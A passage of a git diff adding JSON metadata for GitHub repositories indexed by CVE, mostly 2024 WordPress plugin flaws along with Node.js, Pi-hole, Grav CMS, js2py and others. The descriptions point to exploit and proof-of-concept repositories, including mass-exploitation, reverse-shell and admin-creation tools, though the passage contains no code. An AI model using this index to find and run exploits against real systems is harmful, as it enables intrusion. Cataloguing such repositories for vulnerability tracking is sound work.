+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27956",
+ "description": " CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-04-27T11:03:36Z",
+ "updated_at": "2024-06-17T17:29:48Z",
+ "pushed_at": "2024-04-27T11:37:02Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 794368729,
+ "name": "CVE-2024-27956-RCE",
+ "full_name": "diego-tella\/CVE-2024-27956-RCE",
+ "owner": {
+ "login": "diego-tella",
+ "id": 70545257,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4",
+ "html_url": "https:\/\/github.com\/diego-tella"
+ },
+ "html_url": "https:\/\/github.com\/diego-tella\/CVE-2024-27956-RCE",
+ "description": "PoC for SQL Injection in CVE-2024-27956",
+ "fork": false,
+ "created_at": "2024-05-01T01:58:28Z",
+ "updated_at": "2024-06-23T08:43:17Z",
+ "pushed_at": "2024-05-03T11:28:21Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795600666,
+ "name": "CVE-2024-27956-WORDPRESS-RCE-PLUGIN",
+ "full_name": "X-Projetion\/CVE-2024-27956-WORDPRESS-RCE-PLUGIN",
+ "owner": {
+ "login": "X-Projetion",
+ "id": 161194427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4",
+ "html_url": "https:\/\/github.com\/X-Projetion"
+ },
+ "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-27956-WORDPRESS-RCE-PLUGIN",
+ "description": "CVE-2024-27956 WORDPRESS RCE PLUGIN",
+ "fork": false,
+ "created_at": "2024-05-03T16:19:19Z",
+ "updated_at": "2024-05-03T16:31:26Z",
+ "pushed_at": "2024-05-03T16:31:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796391975,
+ "name": "CVE-2024-27956",
+ "full_name": "FoxyProxys\/CVE-2024-27956",
+ "owner": {
+ "login": "FoxyProxys",
+ "id": 166161106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4",
+ "html_url": "https:\/\/github.com\/FoxyProxys"
+ },
+ "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-27956",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T19:50:54Z",
+ "updated_at": "2024-05-15T15:36:53Z",
+ "pushed_at": "2024-05-15T15:36:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 797161822,
+ "name": "CVE-2024-27956",
+ "full_name": "k3ppf0r\/CVE-2024-27956",
+ "owner": {
+ "login": "k3ppf0r",
+ "id": 63085409,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63085409?v=4",
+ "html_url": "https:\/\/github.com\/k3ppf0r"
+ },
+ "html_url": "https:\/\/github.com\/k3ppf0r\/CVE-2024-27956",
+ "description": "CVE-2024-27956",
+ "fork": false,
+ "created_at": "2024-05-07T10:07:00Z",
+ "updated_at": "2024-05-07T14:32:42Z",
+ "pushed_at": "2024-05-07T14:32:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800537570,
+ "name": "WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956",
+ "full_name": "AiGptCode\/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956",
+ "owner": {
+ "login": "AiGptCode",
+ "id": 146197697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146197697?v=4",
+ "html_url": "https:\/\/github.com\/AiGptCode"
+ },
+ "html_url": "https:\/\/github.com\/AiGptCode\/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956",
+ "description": "WordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries",
+ "fork": false,
+ "created_at": "2024-05-14T14:21:49Z",
+ "updated_at": "2024-06-24T13:14:19Z",
+ "pushed_at": "2024-05-29T03:43:05Z",
+ "stargazers_count": 81,
+ "watchers_count": 81,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "android",
+ "backdoor",
+ "backdoors",
+ "cve",
+ "exploit",
+ "hack",
+ "hacking",
+ "html",
+ "nuclei",
+ "nuclei-templates",
+ "php",
+ "ransomware",
+ "rce",
+ "reverse-shell",
+ "shell",
+ "website",
+ "windows",
+ "wordpress",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 81,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 800894301,
+ "name": "CVE-2024-27956-RCE-File-Package",
+ "full_name": "W3BW\/CVE-2024-27956-RCE-File-Package",
+ "owner": {
+ "login": "W3BW",
+ "id": 169884248,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169884248?v=4",
+ "html_url": "https:\/\/github.com\/W3BW"
+ },
+ "html_url": "https:\/\/github.com\/W3BW\/CVE-2024-27956-RCE-File-Package",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-15T07:48:54Z",
+ "updated_at": "2024-05-15T08:11:52Z",
+ "pushed_at": "2024-05-15T08:11:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811676044,
+ "name": "CVE-2024-27956",
+ "full_name": "Cappricio-Securities\/CVE-2024-27956",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-27956",
+ "description": "WordPress Automatic Plugin <= 3.92.0 - SQL Injection",
+ "fork": false,
+ "created_at": "2024-06-07T04:40:06Z",
+ "updated_at": "2024-06-24T10:43:53Z",
+ "pushed_at": "2024-06-24T10:43:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-27956",
+ "cve-2024-27956-exploit",
+ "cve-2024-27956-poc",
+ "cve-2024-27956-scanner",
+ "sql-injection",
+ "sqli",
+ "wordpress",
+ "wp-scan",
+ "wp-sqli"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 812538942,
+ "name": "MASS-CVE-2024-27956",
+ "full_name": "itzheartzz\/MASS-CVE-2024-27956",
+ "owner": {
+ "login": "itzheartzz",
+ "id": 172171370,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172171370?v=4",
+ "html_url": "https:\/\/github.com\/itzheartzz"
+ },
+ "html_url": "https:\/\/github.com\/itzheartzz\/MASS-CVE-2024-27956",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-09T07:21:44Z",
+ "updated_at": "2024-06-26T05:13:48Z",
+ "pushed_at": "2024-06-09T16:37:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814427157,
+ "name": "Valve-Press-CVE-2024-27956-RCE",
+ "full_name": "TadashiJei\/Valve-Press-CVE-2024-27956-RCE",
+ "owner": {
+ "login": "TadashiJei",
+ "id": 154245504,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154245504?v=4",
+ "html_url": "https:\/\/github.com\/TadashiJei"
+ },
+ "html_url": "https:\/\/github.com\/TadashiJei\/Valve-Press-CVE-2024-27956-RCE",
+ "description": "Valve Press - CVE-2024-27956-RCE - SQL Injection",
+ "fork": false,
+ "created_at": "2024-06-13T02:05:31Z",
+ "updated_at": "2024-06-13T02:07:39Z",
+ "pushed_at": "2024-06-13T02:07:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815017516,
+ "name": "CVE-2024-27956-RCE",
+ "full_name": "cve-2024\/CVE-2024-27956-RCE",
+ "owner": {
+ "login": "cve-2024",
+ "id": 172750025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4",
+ "html_url": "https:\/\/github.com\/cve-2024"
+ },
+ "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-27956-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:13:54Z",
+ "updated_at": "2024-06-14T07:15:39Z",
+ "pushed_at": "2024-06-14T07:15:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27971.json b/2024/CVE-2024-27971.json
new file mode 100644
index 0000000000..ec6e0af5d6
--- /dev/null
+++ b/2024/CVE-2024-27971.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 795532767,
+ "name": "CVE-2024-27971-Note",
+ "full_name": "truonghuuphuc\/CVE-2024-27971-Note",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27971-Note",
+ "description": "CVE-2024-27971 WordPress Premmerce Permalink Manager for WooCommerce Plugin <= 2.3.10 is vulnerable to Local File Inclusion",
+ "fork": false,
+ "created_at": "2024-05-03T13:38:33Z",
+ "updated_at": "2024-06-04T06:49:56Z",
+ "pushed_at": "2024-05-03T14:43:31Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27972.json b/2024/CVE-2024-27972.json
new file mode 100644
index 0000000000..4837e5ebfe
--- /dev/null
+++ b/2024/CVE-2024-27972.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 802518507,
+ "name": "CVE-2024-27972-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-27972-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27972-Poc",
+ "description": "CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-05-18T14:17:34Z",
+ "updated_at": "2024-05-18T14:41:02Z",
+ "pushed_at": "2024-05-18T14:40:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27983.json b/2024/CVE-2024-27983.json
new file mode 100644
index 0000000000..e7a44b1192
--- /dev/null
+++ b/2024/CVE-2024-27983.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 786410918,
+ "name": "CVE-2024-27983-nodejs-http2",
+ "full_name": "lirantal\/CVE-2024-27983-nodejs-http2",
+ "owner": {
+ "login": "lirantal",
+ "id": 316371,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/316371?v=4",
+ "html_url": "https:\/\/github.com\/lirantal"
+ },
+ "html_url": "https:\/\/github.com\/lirantal\/CVE-2024-27983-nodejs-http2",
+ "description": "CVE-2024-27983 this repository builds up a vulnerable HTTP2 Node.js server (`server-nossl.js`) based on CVE-2024-27983 which exploits a continuation flood vulnerability in HTTP2 servers.",
+ "fork": false,
+ "created_at": "2024-04-14T11:34:52Z",
+ "updated_at": "2024-05-22T06:13:38Z",
+ "pushed_at": "2024-04-14T11:35:23Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28085.json b/2024/CVE-2024-28085.json
new file mode 100644
index 0000000000..bbcfdc1738
--- /dev/null
+++ b/2024/CVE-2024-28085.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 770117095,
+ "name": "CVE-2024-28085",
+ "full_name": "skyler-ferrante\/CVE-2024-28085",
+ "owner": {
+ "login": "skyler-ferrante",
+ "id": 24577503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24577503?v=4",
+ "html_url": "https:\/\/github.com\/skyler-ferrante"
+ },
+ "html_url": "https:\/\/github.com\/skyler-ferrante\/CVE-2024-28085",
+ "description": "WallEscape vulnerability in util-linux",
+ "fork": false,
+ "created_at": "2024-03-11T00:15:03Z",
+ "updated_at": "2024-04-30T17:08:36Z",
+ "pushed_at": "2024-03-30T01:32:02Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exploit",
+ "privesc",
+ "privilege-escalation",
+ "redteam",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28088.json b/2024/CVE-2024-28088.json
new file mode 100644
index 0000000000..7d6762e0c0
--- /dev/null
+++ b/2024/CVE-2024-28088.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 771904991,
+ "name": "cve-2024-28088-poc",
+ "full_name": "levpachmanov\/cve-2024-28088-poc",
+ "owner": {
+ "login": "levpachmanov",
+ "id": 31389480,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31389480?v=4",
+ "html_url": "https:\/\/github.com\/levpachmanov"
+ },
+ "html_url": "https:\/\/github.com\/levpachmanov\/cve-2024-28088-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-14T07:02:11Z",
+ "updated_at": "2024-03-14T07:03:15Z",
+ "pushed_at": "2024-03-14T07:43:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28116.json b/2024/CVE-2024-28116.json
new file mode 100644
index 0000000000..53a814ac2d
--- /dev/null
+++ b/2024/CVE-2024-28116.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 776776802,
+ "name": "Graver",
+ "full_name": "akabe1\/Graver",
+ "owner": {
+ "login": "akabe1",
+ "id": 46047144,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46047144?v=4",
+ "html_url": "https:\/\/github.com\/akabe1"
+ },
+ "html_url": "https:\/\/github.com\/akabe1\/Graver",
+ "description": "Proof of Concept script to exploit the authenticated SSTI+RCE in Grav CMS (CVE-2024-28116)",
+ "fork": false,
+ "created_at": "2024-03-24T13:14:52Z",
+ "updated_at": "2024-04-04T08:40:53Z",
+ "pushed_at": "2024-03-24T14:49:01Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28247.json b/2024/CVE-2024-28247.json
new file mode 100644
index 0000000000..8cf3eec8a9
--- /dev/null
+++ b/2024/CVE-2024-28247.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 780056999,
+ "name": "CVE-2024-28247-Pi-hole-Arbitrary-File-Read",
+ "full_name": "T0X1Cx\/CVE-2024-28247-Pi-hole-Arbitrary-File-Read",
+ "owner": {
+ "login": "T0X1Cx",
+ "id": 71453093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4",
+ "html_url": "https:\/\/github.com\/T0X1Cx"
+ },
+ "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2024-28247-Pi-hole-Arbitrary-File-Read",
+ "description": "This repository provides an exploit for CVE-2024-28247, highlighting a vulnerability that permits a remote attacker to read arbitrary files on the system.",
+ "fork": false,
+ "created_at": "2024-03-31T15:25:15Z",
+ "updated_at": "2024-04-12T11:56:00Z",
+ "pushed_at": "2024-03-31T15:49:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28255.json b/2024/CVE-2024-28255.json
new file mode 100644
index 0000000000..454679c893
--- /dev/null
+++ b/2024/CVE-2024-28255.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 785532678,
+ "name": "CVE-2024-28255",
+ "full_name": "YongYe-Security\/CVE-2024-28255",
+ "owner": {
+ "login": "YongYe-Security",
+ "id": 90460865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4",
+ "html_url": "https:\/\/github.com\/YongYe-Security"
+ },
+ "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-28255",
+ "description": "OpenMetadata_RCE (CVE-2024-28255) Batch scan\/exploit",
+ "fork": false,
+ "created_at": "2024-04-12T04:29:58Z",
+ "updated_at": "2024-06-08T05:02:23Z",
+ "pushed_at": "2024-04-12T04:41:18Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28397.json b/2024/CVE-2024-28397.json
new file mode 100644
index 0000000000..d9bbceb0d1
--- /dev/null
+++ b/2024/CVE-2024-28397.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 817083025,
+ "name": "CVE-2024-28397-js2py-Sandbox-Escape",
+ "full_name": "Marven11\/CVE-2024-28397-js2py-Sandbox-Escape",
+ "owner": {
+ "login": "Marven11",
+ "id": 110723864,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110723864?v=4",
+ "html_url": "https:\/\/github.com\/Marven11"
+ },
+ "html_url": "https:\/\/github.com\/Marven11\/CVE-2024-28397-js2py-Sandbox-Escape",
+ "description": "CVE-2024-28397: js2py sandbox escape, bypass pyimport restriction.",
+ "fork": false,
+ "created_at": "2024-06-19T01:46:33Z",
+ "updated_at": "2024-06-25T10:07:44Z",
+ "pushed_at": "2024-06-19T01:52:05Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818088894,
+ "name": "CVE-2024-28397-js2py-Sandbox-Escape",
+ "full_name": "CYBER-WARRIOR-SEC\/CVE-2024-28397-js2py-Sandbox-Escape",
+ "owner": {
+ "login": "CYBER-WARRIOR-SEC",
+ "id": 168237449,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168237449?v=4",
+ "html_url": "https:\/\/github.com\/CYBER-WARRIOR-SEC"
+ },
+ "html_url": "https:\/\/github.com\/CYBER-WARRIOR-SEC\/CVE-2024-28397-js2py-Sandbox-Escape",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-21T04:43:21Z",
+ "updated_at": "2024-06-21T04:54:03Z",
+ "pushed_at": "2024-06-21T04:54:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28515.json b/2024/CVE-2024-28515.json
new file mode 100644
index 0000000000..b032139e0d
--- /dev/null
+++ b/2024/CVE-2024-28515.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 774130695,
+ "name": "CVE-2024-28515",
+ "full_name": "heshi906\/CVE-2024-28515",
+ "owner": {
+ "login": "heshi906",
+ "id": 132426770,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132426770?v=4",
+ "html_url": "https:\/\/github.com\/heshi906"
+ },
+ "html_url": "https:\/\/github.com\/heshi906\/CVE-2024-28515",
+ "description": "A vuln about csapp.",
+ "fork": false,
+ "created_at": "2024-03-19T01:53:48Z",
+ "updated_at": "2024-03-23T16:52:04Z",
+ "pushed_at": "2024-03-30T15:08:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28589.json b/2024/CVE-2024-28589.json
new file mode 100644
index 0000000000..ff16a2ca00
--- /dev/null
+++ b/2024/CVE-2024-28589.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781546021,
+ "name": "CVE-2024-28589",
+ "full_name": "Alaatk\/CVE-2024-28589",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-28589",
+ "description": "Local Privilege Escalation Vulnerability on Axigen for Windows",
+ "fork": false,
+ "created_at": "2024-04-03T15:31:02Z",
+ "updated_at": "2024-04-17T11:47:56Z",
+ "pushed_at": "2024-04-03T15:38:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28715.json b/2024/CVE-2024-28715.json
new file mode 100644
index 0000000000..bf4023f076
--- /dev/null
+++ b/2024/CVE-2024-28715.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 771275327,
+ "name": "CVE-2024-28715",
+ "full_name": "Lq0ne\/CVE-2024-28715",
+ "owner": {
+ "login": "Lq0ne",
+ "id": 52685569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52685569?v=4",
+ "html_url": "https:\/\/github.com\/Lq0ne"
+ },
+ "html_url": "https:\/\/github.com\/Lq0ne\/CVE-2024-28715",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-13T01:59:57Z",
+ "updated_at": "2024-03-13T01:59:57Z",
+ "pushed_at": "2024-03-13T02:14:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28741.json b/2024/CVE-2024-28741.json
new file mode 100644
index 0000000000..eb208557d8
--- /dev/null
+++ b/2024/CVE-2024-28741.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770691742,
+ "name": "CVE-2024-28741-northstar-agent-rce-poc",
+ "full_name": "chebuya\/CVE-2024-28741-northstar-agent-rce-poc",
+ "owner": {
+ "login": "chebuya",
+ "id": 146861503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4",
+ "html_url": "https:\/\/github.com\/chebuya"
+ },
+ "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-28741-northstar-agent-rce-poc",
+ "description": "Agent RCE PoC for CVE-2024-28741, a stored XSS vulnerability in NorthStar C2.",
+ "fork": false,
+ "created_at": "2024-03-12T01:40:35Z",
+ "updated_at": "2024-04-16T23:51:09Z",
+ "pushed_at": "2024-03-12T02:16:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28757.json b/2024/CVE-2024-28757.json
new file mode 100644
index 0000000000..eae81f286b
--- /dev/null
+++ b/2024/CVE-2024-28757.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 795349934,
+ "name": "expat_2.1.1_CVE-2024-28757",
+ "full_name": "krnidhi\/expat_2.1.1_CVE-2024-28757",
+ "owner": {
+ "login": "krnidhi",
+ "id": 168801672,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168801672?v=4",
+ "html_url": "https:\/\/github.com\/krnidhi"
+ },
+ "html_url": "https:\/\/github.com\/krnidhi\/expat_2.1.1_CVE-2024-28757",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-03T04:58:24Z",
+ "updated_at": "2024-05-03T10:58:17Z",
+ "pushed_at": "2024-05-03T10:41:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795435234,
+ "name": "expat_CVE-2024-28757",
+ "full_name": "RenukaSelvar\/expat_CVE-2024-28757",
+ "owner": {
+ "login": "RenukaSelvar",
+ "id": 165150685,
